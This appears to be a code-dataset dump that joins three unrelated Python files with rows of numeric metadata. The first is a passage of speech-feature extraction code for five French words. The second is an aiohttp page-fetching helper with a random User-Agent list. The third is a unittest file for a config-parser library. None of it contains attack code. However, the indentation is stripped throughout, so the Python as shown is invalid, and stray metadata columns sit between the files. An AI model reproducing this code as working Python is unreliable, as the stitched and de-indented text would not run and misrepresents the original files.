for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
le_1 = matrix_all_step_new_1
le_2 = matrix_all_step_new_2
le_3 = matrix_all_step_new_3
le_4 = matrix_all_step_new_4
le_5 = matrix_all_step_new_5
#==============================================================================
# # this is the parti for the 'le' end
#==============================================================================
#==============================================================================
# this is the parti for the 'qui' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_3)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
qui_1 = matrix_all_step_new_1
qui_2 = matrix_all_step_new_2
qui_3 = matrix_all_step_new_3
qui_4 = matrix_all_step_new_4
qui_5 = matrix_all_step_new_5
#==============================================================================
# this is the parti for the 'dans' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_4)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
dans_1 = matrix_all_step_new_1
dans_2 = matrix_all_step_new_2
dans_3 = matrix_all_step_new_3
dans_4 = matrix_all_step_new_4
dans_5 = matrix_all_step_new_5
#==============================================================================
# this is the parti for the 'de' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_5)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
de_1 = matrix_all_step_new_1
de_2 = matrix_all_step_new_2
de_3 = matrix_all_step_new_3
de_4 = matrix_all_step_new_4
de_5 = matrix_all_step_new_5
print 'finish_part_1'
#==============================================================================
# # this is the parti for the 'le' end
#==============================================================================
np.savez('je_le_qui_dans_de_192_matrix.npz',je_1,je_2,je_3,je_4,je_5,le_1,le_2,le_3,le_4,le_5,qui_1,qui_2,qui_3,qui_4,qui_5,dans_1,dans_2,dans_3,dans_4,dans_5,de_1,de_2,de_3,de_4,de_5)
| 44.663793
| 184
| 0.491958
| 4,978
| 31,086
| 2.634793
| 0.019888
| 0.035453
| 0.04384
| 0.128088
| 0.962794
| 0.957838
| 0.926121
| 0.924291
| 0.922385
| 0.922385
| 0
| 0.065991
| 0.124011
| 31,086
| 696
| 184
| 44.663793
| 0.415666
| 0.397928
| 0
| 0.905077
| 0
| 0
| 0.005857
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00883
| null | null | 0.002208
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d40cf0a6971b1d4e07c7769350f3a812613bab4b
| 3,895
|
py
|
Python
|
ctft/souper.py
|
bajatin/ctft
|
71e5e42f42d0910b310331c4d19a38ccf0745870
|
[
"MIT"
] | 5
|
2020-08-14T13:20:57.000Z
|
2022-01-09T00:44:22.000Z
|
ctft/souper.py
|
bajatin/ctft
|
71e5e42f42d0910b310331c4d19a38ccf0745870
|
[
"MIT"
] | null | null | null |
ctft/souper.py
|
bajatin/ctft
|
71e5e42f42d0910b310331c4d19a38ccf0745870
|
[
"MIT"
] | null | null | null |
import random
import requests
import aiohttp
import asyncio
from bs4 import BeautifulSoup
user_agent_list = [
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1',
'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0',
'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36',
]
user_agent = random.choice(user_agent_list)
header = {'User-Agent':user_agent}
async def souper(url,session=None):
connector = aiohttp.TCPConnector(limit=5)
if not session:
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get(url, headers=header,raise_for_status=True) as response:
html = await response.text()
return BeautifulSoup(html,'html.parser')
else:
async with session.get(url, headers=header,raise_for_status=True) as response:
html = await response.text()
return BeautifulSoup(html,'html.parser')
| 66.016949
| 128
| 0.689602
| 700
| 3,895
| 3.81
| 0.161429
| 0.071241
| 0.104612
| 0.131984
| 0.781027
| 0.774653
| 0.750281
| 0.709786
| 0.667042
| 0.64117
| 0
| 0.214134
| 0.15353
| 3,895
| 58
| 129
| 67.155172
| 0.594783
| 0
| 0
| 0.117647
| 0
| 0.607843
| 0.748074
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.098039
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00faa9f8df630a887ca74689348c7c8bf3549ee7
| 12,427
|
py
|
Python
|
configlines/tests/test_parsers.py
|
benfogle/configlines
|
7167593d73218b073a822d7ed7b1140587847c6b
|
[
"MIT"
] | 1
|
2018-05-06T20:09:54.000Z
|
2018-05-06T20:09:54.000Z
|
configlines/tests/test_parsers.py
|
benfogle/configlines
|
7167593d73218b073a822d7ed7b1140587847c6b
|
[
"MIT"
] | null | null | null |
configlines/tests/test_parsers.py
|
benfogle/configlines
|
7167593d73218b073a822d7ed7b1140587847c6b
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
import sys
import six
from six.moves import configparser
from pkg_resources import resource_filename
import configlines
class ConfigTest(TestCase):
def test_simple(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
self.assertEqual(cfg.get('foo', 'baz'), '2')
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
self.assertEqual(cfg.get_filename('foo', 'baz'), path)
self.assertEqual(cfg.get_line('foo', 'baz'), 3)
self.assertEqual(cfg.get('qwerty', 'abc'), 'a split\nline')
self.assertEqual(cfg.get_location('qwerty', 'abc'), (path, 11))
self.assertEqual(cfg.get_filename('qwerty', 'abc'), path)
self.assertEqual(cfg.get_line('qwerty', 'abc'), 11)
def test_reassign(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
cfg.set('foo', 'bar', 'q')
self.assertEqual(cfg.get('foo', 'bar'), 'q')
self.assertIsNone(cfg.get_location('foo', 'bar'))
self.assertIsNone(cfg.get_filename('foo', 'bar'))
self.assertIsNone(cfg.get_line('foo', 'bar'))
if sys.hexversion >= 0x03020000:
cfg['foo']['baz'] = 'q'
self.assertEqual(cfg.get('foo', 'baz'), 'q')
self.assertIsNone(cfg.get_location('foo', 'baz'))
self.assertIsNone(cfg.get_filename('foo', 'baz'))
self.assertIsNone(cfg.get_line('foo', 'baz'))
cfg.read_dict({'qwerty':{'abc':'a', 'def':'b'}})
self.assertEqual(cfg.get('qwerty', 'abc'), 'a')
self.assertIsNone(cfg.get_location('qwerty', 'abc'))
self.assertIsNone(cfg.get_filename('qwerty', 'abc'))
self.assertIsNone(cfg.get_line('qwerty', 'abc'))
self.assertEqual(cfg.get('qwerty', 'def'), 'b')
self.assertIsNone(cfg.get_location('qwerty', 'def'))
self.assertIsNone(cfg.get_filename('qwerty', 'def'))
self.assertIsNone(cfg.get_line('qwerty', 'def'))
def test_defaults(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data2.cfg')
cfg.read(path)
self.assertEqual(cfg.get('sectA', 'foo'), '1')
self.assertEqual(cfg.get_location('sectA', 'foo'), (path, 2))
self.assertEqual(cfg.get_filename('sectA', 'foo'), path)
self.assertEqual(cfg.get_line('sectA', 'foo'), 2)
self.assertEqual(cfg.get('sectA', 'bar'), 'B')
self.assertEqual(cfg.get_location('sectA', 'bar'), (path, 9))
self.assertEqual(cfg.get_filename('sectA', 'bar'), path)
self.assertEqual(cfg.get_line('sectA', 'bar'), 9)
self.assertEqual(cfg.get('sectB', 'foo'), 'A')
self.assertEqual(cfg.get_location('sectB', 'foo'), (path, 8))
self.assertEqual(cfg.get_filename('sectB', 'foo'), path)
self.assertEqual(cfg.get_line('sectB', 'foo'), 8)
self.assertEqual(cfg.get('sectB', 'bar'), '2')
self.assertEqual(cfg.get_location('sectB', 'bar'), (path, 5))
self.assertEqual(cfg.get_filename('sectB', 'bar'), path)
self.assertEqual(cfg.get_line('sectB', 'bar'), 5)
def test_multiple_files(self):
cfg = configlines.ConfigParser()
path1 = resource_filename(__name__, 'data2.cfg')
path2 = resource_filename(__name__, 'data3.cfg')
cfg.read([path1, path2])
self.assertEqual(cfg.get('sectA', 'foo'), '1')
self.assertEqual(cfg.get_location('sectA', 'foo'), (path1, 2))
self.assertEqual(cfg.get_filename('sectA', 'foo'), path1)
self.assertEqual(cfg.get_line('sectA', 'foo'), 2)
self.assertEqual(cfg.get('sectA', 'bar'), 'B')
self.assertEqual(cfg.get_location('sectA', 'bar'), (path1, 9))
self.assertEqual(cfg.get_filename('sectA', 'bar'), path1)
self.assertEqual(cfg.get_line('sectA', 'bar'), 9)
self.assertEqual(cfg.get('sectA', 'baz'), '3')
self.assertEqual(cfg.get_location('sectA', 'baz'), (path2, 2))
self.assertEqual(cfg.get_filename('sectA', 'baz'), path2)
self.assertEqual(cfg.get_line('sectA', 'baz'), 2)
def test_explicit_location(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.set('foo', 'bar', 'A', location='preserve')
self.assertEqual(cfg.get('foo', 'bar'), 'A')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
loc = ("not_real.cfg", 1234)
cfg.set('foo', 'bar', 'B', location=loc)
self.assertEqual(cfg.get('foo', 'bar'), 'B')
self.assertEqual(cfg.get_location('foo', 'bar'), loc)
with self.assertRaises(ValueError):
cfg.set('foo', 'bar', 'C', location="a bad value")
self.assertEqual(cfg.get('foo', 'bar'), 'B')
self.assertEqual(cfg.get_location('foo', 'bar'), loc)
